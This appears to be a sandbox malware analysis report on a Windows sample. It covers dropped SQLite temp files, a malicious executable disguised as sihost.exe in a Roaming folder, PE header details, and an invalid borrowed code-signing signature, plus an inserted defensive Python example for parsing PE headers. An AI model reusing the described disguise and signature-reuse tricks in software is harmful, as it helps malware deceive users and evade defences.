Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmp4905.tmp
Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmp4906.tmp
Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmp4907.tmp
Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\tmp6CFB.tmp
Process: C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
C:\Users\user\AppData\Local\Temp\tmp6CFC.tmp
Process: C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
C:\Users\user\AppData\Local\Temp\tmp6D2C.tmp
Process: C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
C:\Users\user\AppData\Local\Temp\tmp6D2D.tmp
Process: C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
C:\Users\user\AppData\Local\Temp\tmp8BC7.tmp
Process: C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: false
C:\Users\user\AppData\Local\Temp\tmp90B4.tmp
Process: C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
C:\Users\user\AppData\Local\Temp\tmp90B5.tmp
Process: C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
C:\Users\user\AppData\Local\Temp\tmp90D5.tmp
Process: C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
C:\Users\user\AppData\Local\Temp\tmp90D6.tmp
Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
C:\Users\user\AppData\Local\Temp\tmpB24B.tmp
Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):40960
Entropy (8bit):0.792852251086831
Encrypted:false
SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:false
C:\Users\user\AppData\Local\Temp\tmpD8C0.tmp
Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):40960
Entropy (8bit):0.792852251086831
Encrypted:false
SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:false
C:\Users\user\AppData\Local\Temp\tmpD8C1.tmp
Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):40960
Entropy (8bit):0.792852251086831
Encrypted:false
SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:false
C:\Users\user\AppData\Local\Temp\tmpFF36.tmp
Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):40960
Entropy (8bit):0.792852251086831
Encrypted:false
SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:false
C:\Users\user\AppData\Local\Temp\tmpFF37.tmp
Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):40960
Entropy (8bit):0.792852251086831
Encrypted:false
SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:false
C:\Users\user\AppData\Local\Temp\tmpFF76.tmp
Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):20480
Entropy (8bit):0.6951152985249047
Encrypted:false
SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
MD5:EA7F9615D77815B5FFF7C15179C6C560
SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
Malicious:false
C:\Users\user\AppData\Local\Temp\tmpFF77.tmp
Process:C:\Users\user\Desktop\eYvT1lg5Dy.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):20480
Entropy (8bit):0.6951152985249047
Encrypted:false
SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
MD5:EA7F9615D77815B5FFF7C15179C6C560
SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
Malicious:false
                                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe
                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\filename.exe
                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):293376
                                                                                                                                                                                        Entropy (8bit):5.931158889112942
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3072:8V6xXhEcKxT2njS+HZlWBFhHxPfu0ay/MvZ6KaUnnXf3cUgH8ubSboIjFQkm5yUH:q+Xrc2njSelWbHPpOrnXfsUnubSRjF+
                                                                                                                                                                                        MD5:D508B954A785BDB77FDEFFCD4C56F8E5
                                                                                                                                                                                        SHA1:272273F6055837B0BACD96885B7840D117EF2676
                                                                                                                                                                                        SHA-256:2FE1087DD787D625F0AA84EADA3CC4F0A0E73B340B4AFEC366035F2916E9FC66
                                                                                                                                                                                        SHA-512:B11608356FE082CA661A97B49FF33B0E664A603492AC070621B72628AC71032CCB4F4F57C2380E912BD3819A29FCFCCA562D34B6D266809ACF8B94D28DDA4750
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 49%
                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."...f.y.f.y.f.y....M.y....v.y......y.o..e.y.f.x...y....g.y....g.y....g.y.Richf.y.................PE..L......_.....................(w.....`.............@...........................y.....)........................................+..(.....w.pG....................w..... ................................#..@............................................text............................... ..`.rdata..............................@..@.data....\u..@......................@....rsrc...pG....w..H...(..............@..@.reloc........w......p..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        Static File Info

                                                                                                                                                                                        General

                                                                                                                                                                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                        Entropy (8bit):6.388654918608066
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                        File name:eYvT1lg5Dy.exe
                                                                                                                                                                                        File size:404648
                                                                                                                                                                                        MD5:355fbd5060b3bbaf8c5737b4279e9000
                                                                                                                                                                                        SHA1:88fa1113f76294bade7fd9075cd5e4ea76cf5314
                                                                                                                                                                                        SHA256:383f147b7eb4c815bc9def993cff994da41c7395092ceedd3c22d10e130b8c15
                                                                                                                                                                                        SHA512:61d2bf26de32559b0701181e6885ae0d48fecdab30041d9f8970a4f770b9240c4968346de1a32792c0d82e33ecf2562df45611ac09a442bac380f6a821ecd4a1
                                                                                                                                                                                        SSDEEP:6144:hvVtPR9Pnxd2EDFDiah109/UWi9RoJAq3+Cbs+3we88Kqb11tW7GvVsu:959Pnxd20FG9/+foLuBTFc1tW7ysu
                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}*..9K..9K..9K..'...(K..'...UK..'....K......<K..9K...K..'...8K..'...8K..'...8K..Rich9K..........................PE..L.....]`...

                                                                                                                                                                                        File Icon

                                                                                                                                                                                        Icon Hash:13533333495c0d90

                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                        General

                                                                                                                                                                                        Entrypoint:0x401cc0
                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                                                                        Time Stamp:0x605D9BE8 [Fri Mar 26 08:31:36 2021 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                        Import Hash:0f0c12643909b692a9be3510bdc965e8

                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                        Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                         Error Number:-2146869232 (0x80096010, TRUST_E_BAD_DIGEST)
                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                        • 2/8/2016 4:00:00 PM 2/13/2019 4:00:00 AM
                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                         • CN=Tim Kosse, O=Tim Kosse, L=Köln, S=Nordrhein-Westfalen, C=DE
                                                                                                                                                                                        Version:3
                                                                                                                                                                                        Thumbprint MD5:DD83D3635E4EEC9269AE569DF9F8F0E8
                                                                                                                                                                                        Thumbprint SHA-1:6791D3709B9D59294FE973B6319D896094E5FC20
                                                                                                                                                                                        Thumbprint SHA-256:5BD4F7C88CD5F9E41C73BB69B732E2A133D0F7B20ABBAD2F0BB9A3B8BD42060C
                                                                                                                                                                                        Serial:01BCA2F95937E3F850F546B3B60DA86F
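
The fields under Static PE Info and Authenticode Signature can be reproduced from the file's own headers, and doing so shows why "Digitally signed: true" and "Signature Valid: false" are not a contradiction. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses the DOS, COFF and PE32 optional headers, renders the COFF TimeDateStamp the way the report's "Time Stamp" line does, reports whether a Security Directory (the Authenticode blob) is present, which is all "Digitally signed" means, and checks whether the compile timestamp falls inside the signing certificate's Not Before / Not After window. The header-only file built by build_sample_pe32() is constructed for the example from the values shown above; its Security Directory offset and size are made-up placeholders, and the report's certificate dates are assumed to be UTC. It does not verify the signature itself (hashing the image and checking the PKCS#7 blob), which is the step that produced the report's error -2146869232 (0x80096010, TRUST_E_BAD_DIGEST).

```python
import struct
from datetime import datetime, timezone

# Header constants (PE32 only; a PE32+ file uses the 64-bit optional-header layout).
IMAGE_DOS_SIGNATURE = 0x5A4D         # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550      # "PE\0\0"
PE32_MAGIC = 0x10B
IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # Authenticode blob; this entry holds a file offset, not an RVA
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}
CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
                       0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}


def flag_names(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def pe_timestamp_to_utc(ts):
    # COFF TimeDateStamp is seconds since the Unix epoch; the linker writes it and it is trivially forgeable.
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def format_report_timestamp(ts):
    # Same rendering as the report's "Time Stamp" line.
    return "0x%08X [%s UTC]" % (ts, pe_timestamp_to_utc(ts).strftime("%a %b %d %H:%M:%S %Y"))


def parse_pe32_headers(data):
    """Extract the 'Static PE Info' fields from raw file bytes; raises ValueError on a malformed header."""
    if len(data) < 0x40 or struct.unpack_from("<H", data, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or struct.unpack_from("<I", data, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError("missing PE signature")
    # COFF file header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _machine, _nsect, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if opt_size < 96 or opt + opt_size > len(data) or struct.unpack_from("<H", data, opt)[0] != PE32_MAGIC:
        raise ValueError("not a PE32 optional header")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    n_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    sec_off = sec_size = 0
    if n_dirs > IMAGE_DIRECTORY_ENTRY_SECURITY and opt_size >= 96 + 8 * (IMAGE_DIRECTORY_ENTRY_SECURITY + 1):
        sec_off, sec_size = struct.unpack_from("<II", data, opt + 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    return {
        "entrypoint": image_base + entry_rva,
        "imagebase": image_base,
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "characteristics": flag_names(chars, CHARACTERISTICS),
        "dll_characteristics": flag_names(dll_chars, DLL_CHARACTERISTICS),
        "timestamp": ts,
        "timestamp_utc": pe_timestamp_to_utc(ts),
        # "Digitally signed" only means a Security Directory exists; it says nothing about validity.
        "digitally_signed": sec_off != 0 and sec_size != 0,
    }


def parse_report_time(s):
    # The report prints certificate dates as "M/D/YYYY h:mm:ss AM/PM"; treated as UTC here (assumption).
    return datetime.strptime(s, "%m/%d/%Y %I:%M:%S %p").replace(tzinfo=timezone.utc)


def cert_covered_build(info, not_before, not_after):
    """True if the signer's certificate was valid at the file's compile timestamp. False means the visible
    signature cannot have been produced for this build while the certificate was live: either the signature
    block was transplanted from another binary or the timestamp is not genuine."""
    return parse_report_time(not_before) <= info["timestamp_utc"] <= parse_report_time(not_after)


def build_sample_pe32():
    """Constructed, header-only PE32 carrying the values the report lists for eYvT1lg5Dy.exe.
    This is not the sample; the Security Directory offset and size are made-up placeholders."""
    dos = bytearray(0x40)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew
    coff = struct.pack("<IHHIIIHH", IMAGE_NT_SIGNATURE, 0x14C, 5, 0x605D9BE8, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, 0x1CC0)                      # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                    # ImageBase
    struct.pack_into("<HH", opt, 40, 5, 0)                       # OS version 5.0
    struct.pack_into("<HH", opt, 68, 3, 0x8100)                  # CUI; NX_COMPAT | TERMINAL_SERVER_AWARE
    struct.pack_into("<I", opt, 92, 16)                          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, 0x60000, 0x2000)  # placeholder
    return bytes(dos) + coff + bytes(opt)


def sample_info():
    return parse_pe32_headers(build_sample_pe32())


if __name__ == "__main__":
    info = sample_info()
    print("Entrypoint:          0x%x" % info["entrypoint"])
    print("Subsystem:           %s" % info["subsystem"])
    print("Characteristics:     %s" % ", ".join(info["characteristics"]))
    print("DLL Characteristics: %s" % ", ".join(info["dll_characteristics"]))
    print("Time Stamp:          %s" % format_report_timestamp(info["timestamp"]))
    print("Digitally signed:    %s" % info["digitally_signed"])
    print("Cert covered build:  %s" % cert_covered_build(info, "2/8/2016 4:00:00 PM", "2/13/2019 4:00:00 AM"))
```

Run against the constructed header this reproduces the report's Entrypoint, Subsystem, Characteristics, DLL Characteristics and Time Stamp lines, and cert_covered_build() returns False: the certificate's Not After (February 2019) is about two years before the compile timestamp (March 2021), so even before hashing the image the signature could not be a valid one for this build. On a real file, a True here still only says the dates line up; the PKCS#7 digest check is what decides validity.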

                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                        Instruction
                                                                                                                                                                                        mov edi, edi
                                                                                                                                                                                        push ebp
                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                        call 00007F24307E5A9Bh
                                                                                                                                                                                        call 00007F24307DEAD6h
                                                                                                                                                                                        pop ebp
                                                                                                                                                                                        ret
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
